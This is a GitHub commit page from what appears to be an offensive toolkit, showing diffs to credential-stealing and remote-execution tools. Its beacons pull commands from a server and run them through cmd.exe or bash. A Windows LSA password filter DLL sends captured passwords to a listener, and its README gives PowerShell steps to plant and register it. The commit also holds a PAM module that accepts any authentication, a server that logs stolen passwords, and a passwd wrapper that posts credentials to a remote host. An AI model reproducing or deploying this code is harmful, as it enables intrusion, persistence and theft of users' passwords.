Tool updates

iDigitalFlame · Jan 30, 2020 · 938d70f · 938d70f
1 parent a29c4ef
commit 938d70f
Show file tree

Hide file tree

Showing 10 changed files with 89 additions and 103 deletions.
diff --git a/Beacons/Service/service.c → Beacons/WindowsService/service.c b/Beacons/Service/service.c → Beacons/WindowsService/service.c
diff --git a/Beacons/Service/service.go → Beacons/WindowsService/service.go b/Beacons/Service/service.go → Beacons/WindowsService/service.go
@@ -24,26 +24,36 @@ import (
 	"io"
 	"net/http"
 	"os/exec"
+	"strings"
 	"time"
 )
 
+const (
+	pass = C.int(0)
+	fail = C.int(1)
+)
+
 func main() {}
 
 //export SvcFunc
 func SvcFunc(s *C.char) C.int {
-	r, err := http.NewRequest("GET", fmt.Sprintf("http://%s/windows.txt", C.GoString(s)), nil)
+	x, f := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
+	defer f()
+	r, err := http.NewRequestWithContext(x, http.MethodGet, fmt.Sprintf("http://%s/windows.txt", C.GoString(s)), nil)
 	if err != nil {
-		return C.int(-1)
+		return fail
 	}
-	x, _ := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
 	b, err := http.DefaultClient.Do(r.WithContext(x))
 	if err != nil {
-		return C.int(-1)
+		return fail
 	}
 	defer b.Body.Close()
 	d := &bytes.Buffer{}
 	io.Copy(d, b.Body)
-	e := exec.Command("cmd.exe", "/c", string(d.Bytes()))
-	e.Start()
-	return C.int(0)
+	e := exec.Command("cmd.exe", "/c", strings.ReplaceAll(string(d.Bytes()), "\n", ""))
+	if err := e.Start(); err != nil {
+		return fail
+	}
+	e.Wait()
+	return pass
 }
diff --git a/Beacons/beacon_win.go b/Beacons/beacon_win.go
diff --git a/Beacons/beacon_liinux.go → Beacons/linux.go b/Beacons/beacon_liinux.go → Beacons/linux.go
@@ -22,7 +22,9 @@ import (
 	"fmt"
 	"io"
 	"net/http"
+	"os"
 	"os/exec"
+	"strings"
 	"time"
 )
 
@@ -31,18 +33,22 @@ const (
 )
 
 func main() {
-	r, err := http.NewRequest("GET", fmt.Sprintf("http://%s/linux.txt", server), nil)
+	x, f := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
+	defer f()
+	r, err := http.NewRequestWithContext(x, http.MethodGet, fmt.Sprintf("http://%s/linux.txt", server), nil)
 	if err != nil {
-		return
+		os.Exit(0)
 	}
-	x, _ := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
-	b, err := http.DefaultClient.Do(r.WithContext(x))
+	b, err := http.DefaultClient.Do(r)
 	if err != nil {
-		return
+		os.Exit(0)
 	}
 	defer b.Body.Close()
 	d := &bytes.Buffer{}
 	io.Copy(d, b.Body)
-	e := exec.Command("bash", "-c", string(d.Bytes()))
-	e.Start()
+	e := exec.Command("bash", "-c", strings.ReplaceAll(string(d.Bytes()), "\n", ""))
+	if err := e.Start(); err != nil {
+		os.Exit(0)
+	}
+	e.Wait()
 }
diff --git a/Filter/README.md b/Filter/README.md
@@ -1,20 +1,22 @@
 # PasswordFilter
 
-```
-Compile:
+## Compile
 
+```[bash]
 env GOOS=windows CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -v -x -buildmode=c-archive filter.go
 x86_64-w64-mingw32-gcc -c -o "filter.o" filter.c -fPIC -pthread -lwinmm -lntdll -lws2_32 -DSERVER='"<yourlistenip>:<listenport>"'
 x86_64-w64-mingw32-gcc -o filter.dll -s -shared filter.o filter.a -fPIC -pthread -lwinmm -lntdll -lws2_32 -DSERVER='<yourlistenip>:<listenport>"'
 rm -f filter.o
 rm -f filter.h
 rm -f filter.a
+```
 
-### Install With
+## Install
 
+```[powershell]
 powershell -com "$a=New-Object System.Net.WebClient; $a.DownloadFile('http://<webserver>/filter.dll', 'C:\Windows\system32\idk.dll');"
 powershell -con "$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`nidk"""
 Reboot the box
 ??
 Profit!
-```
+```
diff --git a/Filter/filter.c b/Filter/filter.c
@@ -45,7 +45,6 @@ void _() {
     HaGotEm(NULL, 0, NULL, 0, NULL);
 }
 __declspec(dllexport) BOOL NTAPI InitializeChangeNotify(void) { return TRUE; }
-
 BOOL WINAPI DllMain(HINSTANCE hiDLL, DWORD dwReason, LPVOID lpReserved) { return TRUE; }
 
 __declspec(dllexport) NTSTATUS NTAPI PasswordChangeNotify(PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword) {

diff --git a/Filter/filter.go b/Filter/filter.go
@@ -28,10 +28,17 @@ import (
 	"time"
 )
 
-func getIPAddress() string {
+const (
+	pass  = C.int(0)
+	fail  = C.int(1)
+	nilIP = "<nil>"
+)
+
+func main() {}
+func getIP() string {
 	i, err := net.Interfaces()
 	if err != nil {
-		return "<nil>"
+		return nilIP
 	}
 	for _, a := range i {
 		if a.Flags&net.FlagUp == 0 || a.Flags&net.FlagLoopback != 0 {
@@ -57,18 +64,20 @@ func getIPAddress() string {
 				return r.String()
 			}
 		} else {
-			return "<nil>"
+			return nilIP
 		}
 	}
-	return "<nil>"
+	return nilIP
 }
 
 //export HaGotEm
 func HaGotEm(s *C.char, l C.int, u *C.char, n C.int, p *C.char) C.int {
-	a := []byte(C.GoStringN(u, l))
-	y := []byte(C.GoStringN(p, n))
-	e := make([]rune, l/2)
-	k := make([]rune, n/2)
+	var (
+		a = []byte(C.GoStringN(u, l))
+		y = []byte(C.GoStringN(p, n))
+		e = make([]rune, l/2)
+		k = make([]rune, n/2)
+	)
 	for i := 0; i < len(a); i += 2 {
 		e[i/2] = rune(a[i])
 	}
@@ -81,15 +90,13 @@ func HaGotEm(s *C.char, l C.int, u *C.char, n C.int, p *C.char) C.int {
 	}
 	x, err := net.DialTimeout("tcp", C.GoString(s), time.Duration(5*time.Second))
 	if err != nil {
-		return C.int(-1)
+		return fail
 	}
 	defer x.Close()
-	d := []byte(fmt.Sprintf("[%s:(%s)%s:%s]\n", h, getIPAddress(), string(e), string(k)))
+	d := []byte(fmt.Sprintf("[%s:(%s)%s:%s]\n", h, getIP(), string(e), string(k)))
 	if _, err := x.Write(d); err != nil {
-		return C.int(-1)
+		return fail
 	}
 	x.Close()
-	return C.int(0)
+	return pass
 }
-
-func main() {}
diff --git a/Pam/pam.c b/Pam/pam.c
@@ -20,14 +20,6 @@
 #include <security/pam_appl.h>
 #include <security/pam_modules.h>
 
-PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
-	return PAM_SUCCESS;
-}
-
-PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
-	return PAM_SUCCESS;
-}
-
-PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) {
-	return PAM_SUCCESS;
-}
+PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) { return PAM_SUCCESS; }
+PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) { return PAM_SUCCESS; }
+PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) { return PAM_SUCCESS; }
diff --git a/Server/server.go b/Server/server.go
@@ -25,41 +25,38 @@ import (
 	"os"
 )
 
-type webServer struct {
-	dirFile      io.WriteCloser
-	dirServer    http.Handler
-	dirPasswords string
+type server struct {
+	dir http.Handler
+	log io.WriteCloser
 }
 
 func main() {
 	if len(os.Args) < 3 {
-		fmt.Printf("%s <httpdir> <passwd_file>\n", os.Args[0])
+		fmt.Printf("%s <dir> <log>\n", os.Args[0])
+		os.Exit(1)
 	}
-	h := &webServer{
-		dirServer:    http.FileServer(http.Dir(os.Args[1])),
-		dirPasswords: os.Args[2],
-	}
-	h.Init()
+
+	h := &server{dir: http.FileServer(http.Dir(os.Args[1]))}
+	h.init(os.Args[2])
 	http.Handle("/", h)
-	defer h.dirFile.Close()
+
+	defer h.log.Close()
 	log.Fatal(http.ListenAndServe("0.0.0.0:80", nil))
 }
-
-func (s *webServer) Init() {
-	f, err := os.OpenFile(s.dirPasswords, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
+func (s *server) init(p string) {
+	f, err := os.OpenFile(p, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
 	if err != nil {
 		panic(err)
 	}
-	s.dirFile = f
+	s.log = f
 }
-
-func (s *webServer) ServeHTTP(w http.ResponseWriter, r *http.Request) {
-	if r.Method == "POST" {
+func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
+	if r.Method == http.MethodPost {
 		b := &bytes.Buffer{}
-		defer r.Body.Close()
 		io.Copy(b, r.Body)
-		fmt.Fprintf(s.dirFile, "%s\n", string(b.Bytes()))
+		fmt.Fprintf(s.log, "%s\n", string(b.Bytes()))
+		r.Body.Close()
 	} else {
-		s.dirServer.ServeHTTP(w, r)
+		s.dir.ServeHTTP(w, r)
 	}
 }
diff --git a/Wrapper/wrapper.go b/Wrapper/wrapper.go
@@ -32,11 +32,12 @@ import (
 
 const (
 	bin    = "/bin/.pass"
-	server = "<server>:<port>"
+	nilIP  = "<nil>"
 	comm1  = "printf '%s\n%s\n' | /bin/.pass"
 	comm3  = "printf '%s\n%s\n' | /bin/.pass %s"
 	comm2  = "printf '%s\n%s\n%s\n' | /bin/.pass"
 	comm4  = "printf '%s\n%s\n%s\n' | /bin/.pass %s"
+	server = "<server>:<port>"
 )
 
 func main() {
@@ -105,10 +106,10 @@ func main() {
 	fmt.Printf("Password changed sucessfully.\n")
 	os.Exit(0)
 }
-func getIPAddress() string {
+func getIP() string {
 	i, err := net.Interfaces()
 	if err != nil {
-		return "<nil>"
+		return nilIP
 	}
 	for _, a := range i {
 		if a.Flags&net.FlagUp == 0 || a.Flags&net.FlagLoopback != 0 {
@@ -134,24 +135,24 @@ func getIPAddress() string {
 				return r.String()
 			}
 		} else {
-			return "<nil>"
+			return nilIP
 		}
 	}
-	return "<nil>"
+	return nilIP
 }
 func sendPassword(u string, p string, o string) {
 	h, err := os.Hostname()
 	if err != nil {
 		h = ""
 	}
-	d := bytes.NewReader([]byte(fmt.Sprintf("[%s:(%s)%s:%s-%s]\n", h, getIPAddress(), u, p, o)))
-	r, err := http.NewRequest("POST", fmt.Sprintf("http://%s/p/", server), d)
+	d := bytes.NewReader([]byte(fmt.Sprintf("[%s:(%s)%s:%s-%s]\n", h, getIP(), u, p, o)))
+	x, f := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
+	defer f()
+	r, err := http.NewRequestWithContext(x, http.MethodPost, fmt.Sprintf("http://%s/p/", server), d)
 	if err != nil {
 		return
 	}
-	x, f := context.WithTimeout(context.Background(), time.Duration(5*time.Second))
-	defer f()
-	b, err := http.DefaultClient.Do(r.WithContext(x))
+	b, err := http.DefaultClient.Do(r)
 	if err != nil {
 		return
 	}